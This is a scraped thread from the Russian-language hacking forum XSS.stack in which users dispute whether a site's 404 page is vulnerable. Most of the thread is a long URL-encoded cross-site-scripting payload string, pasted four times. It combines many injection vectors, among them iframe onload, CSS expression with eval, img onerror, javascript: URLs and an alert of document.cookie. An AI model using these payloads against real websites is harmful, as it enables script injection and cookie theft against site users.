-
XSS.stack #1 – первый литературный журнал от юзеров форума
vull
- Автор темы S4nt1n3l
- Дата начала
This is simple 404 page, lol
судя по тому что автор замазал 404 это явная провокация, возможно он причастен к серии англоязычных кидков https://exploit.in/forum/index.php?showtopic=87045
- Автор темы
- Добавить закладку
- #4
for you, 404 , it means that you have not forgotten the source code , take a look ! :bang:
get a valid url, its not working
/invite***%20/secure%3Ciframe%3C?php%20echo%20chr(11)?%3E%20onload=alert(%27XSS%27)%3E%3C/iframe%3E%20%3Cdiv%20style=%22x:expression((window.r==1)?%27%27:eval(%27r=1;ale%20rt(String.fromCharCo%20de(88,83,83));%27))%22%3E%20window.alert(%22Xyli%20!%22);%20%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert(1)%3E%20[color=red%27%20onmouseover=%22alert(%27xss%27)%22]mouse%20over%20%3Cbody%20onLoad=%22alert(%27XSS%27);%22%20%3Cbody%20onunload=%22javascript:alert(%27XSS%27);%22%3E%20click%20me%20%3Cscript%20language=%22JavaScript%22%3Ealert(%27XSS%27)%3C/script%3E%20%3Cimg%20src=%22javascript:alert(%27XSS%27)%22%3E%20%27);%20alert(%27XSS%20%3Cfont%20style=%27color:expression(alert(document.cookie))%27%3E%20%3CIMG%20DYNSRC=\%22javascript:alert(%27XSS%27%20-%20Address%20coru.ws,%20DateStamp%201434066257
/invite***%20/secure%3Ciframe%3C?php%20echo%20chr(11)?%3E%20onload=alert(%27XSS%27)%3E%3C/iframe%3E%20%3Cdiv%20style=%22x:expression((window.r==1)?%27%27:eval(%27r=1;ale%20rt(String.fromCharCo%20de(88,83,83));%27))%22%3E%20window.alert(%22Xyli%20!%22);%20%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert(1)%3E%20[color=red%27%20onmouseover=%22alert(%27xss%27)%22]mouse%20over%20%3Cbody%20onLoad=%22alert(%27XSS%27);%22%20%3Cbody%20onunload=%22javascript:alert(%27XSS%27);%22%3E%20click%20me%20%3Cscript%20language=%22JavaScript%22%3Ealert(%27XSS%27)%3C/script%3E%20%3Cimg%20src=%22javascript:alert(%27XSS%27)%22%3E%20%27);%20alert(%27XSS%20%3Cfont%20style=%27color:expression(alert(document.cookie))%27%3E%20%3CIMG%20DYNSRC=\%22javascript:alert(%27XSS%27%20-%20Address%20coru.ws,%20DateStamp%201434066257
- Автор темы
- Добавить закладку
- #6
bro, check source code!
<p>
*** //invite**%3C*%20/secure%3Ciframe%3C?php%20echo%20chr(11)?%3E%20onload=alert(%27XSS%27)%3E%3C/iframe%3E%20%3Cdiv%20style=%22x:expression((window.r==1)?%27%27:eval(%27r=1;ale%20rt(String.fromCharCo%20de(88,83,83));%27))%22%3E%20window.alert(%22Xyli%20!%22);%20%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert(1)%3E%20[color=red%27%20onmouseover=%22alert(%27xss%27)%22]mouse%20over%20%3Cbody%20onLoad=%22alert(%27XSS%27);%22%20%3Cbody%20onunload=%22javascript:alert(%27XSS%27);%22%3E%20click%20me%20%3Cscript%20language=%22JavaScript%22%3Ealert(%27XSS%27)%3C/script%3E%20%3Cimg%20src=%22javascript:alert(%27XSS%27)%22%3E%20%27);%20alert(%27XSS%20%3Cfont%20style=%27color:expression(alert(document.cookie))%27%3E%20%3CIMG%20DYNSRC=\%22javascript:alert(%27XSS%27%20-%20Address%20coru.ws,%20DateStamp%201434066257 - Address coru.ws, DateStamp 1434144043</p>
and what?
*** //invite**%3C*%20/secure%3Ciframe%3C?php%20echo%20chr(11)?%3E%20onload=alert(%27XSS%27)%3E%3C/iframe%3E%20%3Cdiv%20style=%22x:expression((window.r==1)?%27%27:eval(%27r=1;ale%20rt(String.fromCharCo%20de(88,83,83));%27))%22%3E%20window.alert(%22Xyli%20!%22);%20%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert(1)%3E%20[color=red%27%20onmouseover=%22alert(%27xss%27)%22]mouse%20over%20%3Cbody%20onLoad=%22alert(%27XSS%27);%22%20%3Cbody%20onunload=%22javascript:alert(%27XSS%27);%22%3E%20click%20me%20%3Cscript%20language=%22JavaScript%22%3Ealert(%27XSS%27)%3C/script%3E%20%3Cimg%20src=%22javascript:alert(%27XSS%27)%22%3E%20%27);%20alert(%27XSS%20%3Cfont%20style=%27color:expression(alert(document.cookie))%27%3E%20%3CIMG%20DYNSRC=\%22javascript:alert(%27XSS%27%20-%20Address%20coru.ws,%20DateStamp%201434066257 - Address coru.ws, DateStamp 1434144043</p>
and what?